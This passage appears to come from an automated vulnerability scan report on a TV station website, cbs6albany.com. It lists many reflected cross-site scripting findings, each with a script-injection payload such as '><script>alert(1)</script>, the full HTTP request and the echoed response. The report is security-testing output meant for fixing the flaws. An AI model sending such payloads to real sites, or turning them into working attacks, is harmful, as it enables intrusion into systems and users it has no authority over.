The value of the js request parameter is copied into a JavaScript inline comment. The payload 24549*/alert(1)//d473b38e549 was submitted in the js parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the js request parameter is copied into the HTML document as plain text between tags. The payload a475f<script>alert(1)</script>3024595e285 was submitted in the js parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
4.828. http://www.cbs6albany.com/common/tools/load.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cbs6albany.com
Path:
/common/tools/load.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload 67037*/alert(1)//a0d841c9b61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:43:10 GMT Server: Apache Last-Modified: Sat, 29 Jan 2011 01:43:10 GMT ETag: "1d0c52853ddbe1f2f6ea7445acd94b09-26445" Cache-Control: max-age=86400 Expires: Sun, 30 Jan 2011 01:43:10 GMT Vary: Accept-Encoding,User-Agent Content-Type: text/javascript Content-Length: 26445
/* http://www.cbs6albany.com/common/tools/load.php?js=common_poll,common_nav,common_tabBox,common_contentslider,common_freedom,common_ads,common_page&67037*/alert(1)//a0d841c9b61=1 */ function loadPoll(pollid,sitecode) { var pollwrapper = document.getElementById('pollwrapper'); var scriptname = "/onsetfeature/pollcap.php?station=" + sitecode; getPollResult(polli ...[SNIP]...
4.829. http://www.cbs6albany.com/common/tools/load.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cbs6albany.com
Path:
/common/tools/load.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e196f<script>alert(1)</script>3cfc0cbcbcf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
4.830. http://www.cbs6albany.com/sections/abouthdtv/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cbs6albany.com
Path:
/sections/abouthdtv/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 74765'><script>alert(1)</script>438a92d147a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sections/abouthdtv/?74765'><script>alert(1)</script>438a92d147a=1 HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:27:07 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:37:07 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 23597
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
4.831. http://www.cbs6albany.com/sections/contactus/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cbs6albany.com
Path:
/sections/contactus/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ffa76'><script>alert(1)</script>48177ec7652 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sections/contactus/?ffa76'><script>alert(1)</script>48177ec7652=1 HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:27:59 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:37:59 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 24696
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
4.832. http://www.cbs6albany.com/sections/contactus/newstips/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cbs6albany.com
Path:
/sections/contactus/newstips/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c9651'><script>alert(1)</script>849d20d07f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sections/contactus/newstips/?c9651'><script>alert(1)</script>849d20d07f1=1 HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:29:23 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:39:23 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 44060
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]... <a href='/sections/contactus/newstips/?c9651'><script>alert(1)</script>849d20d07f1=1'> ...[SNIP]...
4.833. http://www.cbs6albany.com/sections/employmentopportunities/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cbs6albany.com
Path:
/sections/employmentopportunities/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2930b'><script>alert(1)</script>bd162823394 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sections/employmentopportunities/?2930b'><script>alert(1)</script>bd162823394=1 HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:32:17 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:42:17 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 23695
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
4.834. http://www.cbs6albany.com/sections/jobsonline/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cbs6albany.com
Path:
/sections/jobsonline/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9cfe9'><script>alert(1)</script>7666009c44c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sections/jobsonline/?9cfe9'><script>alert(1)</script>7666009c44c=1 HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:32:52 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:42:52 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 43006
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]... <a href='/sections/jobsonline/?9cfe9'><script>alert(1)</script>7666009c44c=1'> ...[SNIP]...
4.835. http://www.cbs6albany.com/sections/live-cameras/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cbs6albany.com
Path:
/sections/live-cameras/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 129c2'><script>alert(1)</script>b7126808f47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sections/live-cameras/?129c2'><script>alert(1)</script>b7126808f47=1 HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:28:00 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:38:00 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 43174
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]... <a href='/sections/live-cameras/?129c2'><script>alert(1)</script>b7126808f47=1'> ...[SNIP]...
4.836. http://www.cbs6albany.com/sections/local-news/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cbs6albany.com
Path:
/sections/local-news/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 73375'><script>alert(1)</script>a26b2e249d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sections/local-news/?73375'><script>alert(1)</script>a26b2e249d1=1 HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:29:23 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:39:23 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 87796
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]... <a href='/sections/local-news/?73375'><script>alert(1)</script>a26b2e249d1=1'> ...[SNIP]...
4.837. http://www.cbs6albany.com/sections/local-sports/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cbs6albany.com
Path:
/sections/local-sports/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 33bcf'><script>alert(1)</script>7d78819feea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sections/local-sports/?33bcf'><script>alert(1)</script>7d78819feea=1 HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:28:56 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:38:56 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 74325
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]... <a href='/sections/local-sports/?33bcf'><script>alert(1)</script>7d78819feea=1'> ...[SNIP]...
4.838. http://www.cbs6albany.com/sections/production-department/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cbs6albany.com
Path:
/sections/production-department/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9c35d'><script>alert(1)</script>68cf49f6df8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sections/production-department/?9c35d'><script>alert(1)</script>68cf49f6df8=1 HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:30:23 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:40:23 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 42301
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]... <a href='/sections/production-department/?9c35d'><script>alert(1)</script>68cf49f6df8=1'> ...[SNIP]...
4.839. http://www.cbs6albany.com/sections/publicfile/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cbs6albany.com
Path:
/sections/publicfile/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 93a58'><script>alert(1)</script>726a8db5fcf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sections/publicfile/?93a58'><script>alert(1)</script>726a8db5fcf=1 HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:31:52 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:41:52 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 42570
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]... <a href='/sections/publicfile/?93a58'><script>alert(1)</script>726a8db5fcf=1'> ...[SNIP]...
4.840. http://www.cbs6albany.com/sections/sales/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cbs6albany.com
Path:
/sections/sales/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 42536'><script>alert(1)</script>808b664d1ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sections/sales/?42536'><script>alert(1)</script>808b664d1ae=1 HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:28:13 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:38:13 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 24745
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
4.841. http://www.cbs6albany.com/sections/satellitewaivers/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cbs6albany.com
Path:
/sections/satellitewaivers/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 61465'><script>alert(1)</script>a06280160d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sections/satellitewaivers/?61465'><script>alert(1)</script>a06280160d2=1 HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:31:52 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:41:52 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 42328
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]... <a href='/sections/satellitewaivers/?61465'><script>alert(1)</script>a06280160d2=1'> ...[SNIP]...
4.842. http://www.cbs6albany.com/sections/schoolclosures/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cbs6albany.com
Path:
/sections/schoolclosures/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c4351'><script>alert(1)</script>5e3380a0e97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sections/schoolclosures/?c4351'><script>alert(1)</script>5e3380a0e97=1 HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:29:04 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:39:04 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 37839
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
4.843. http://www.cbs6albany.com/sections/sitemap/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cbs6albany.com
Path:
/sections/sitemap/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload adc57'><script>alert(1)</script>d7b9d0c4880 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sections/sitemap/?adc57'><script>alert(1)</script>d7b9d0c4880=1 HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:27:56 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:37:56 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 40061
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
4.844. http://www.cbs6albany.com/sections/sp-alerts/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cbs6albany.com
Path:
/sections/sp-alerts/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e11ed'><script>alert(1)</script>5063f0c5775 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sections/sp-alerts/?e11ed'><script>alert(1)</script>5063f0c5775=1 HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:29:36 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:39:36 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 37078
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
The value of the taxonomy request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c6a0'%3balert(1)//11741c449be was submitted in the taxonomy parameter. This input was echoed as 2c6a0';alert(1)//11741c449be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
4.846. http://www.cbs6albany.com/sections/traffic-events/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cbs6albany.com
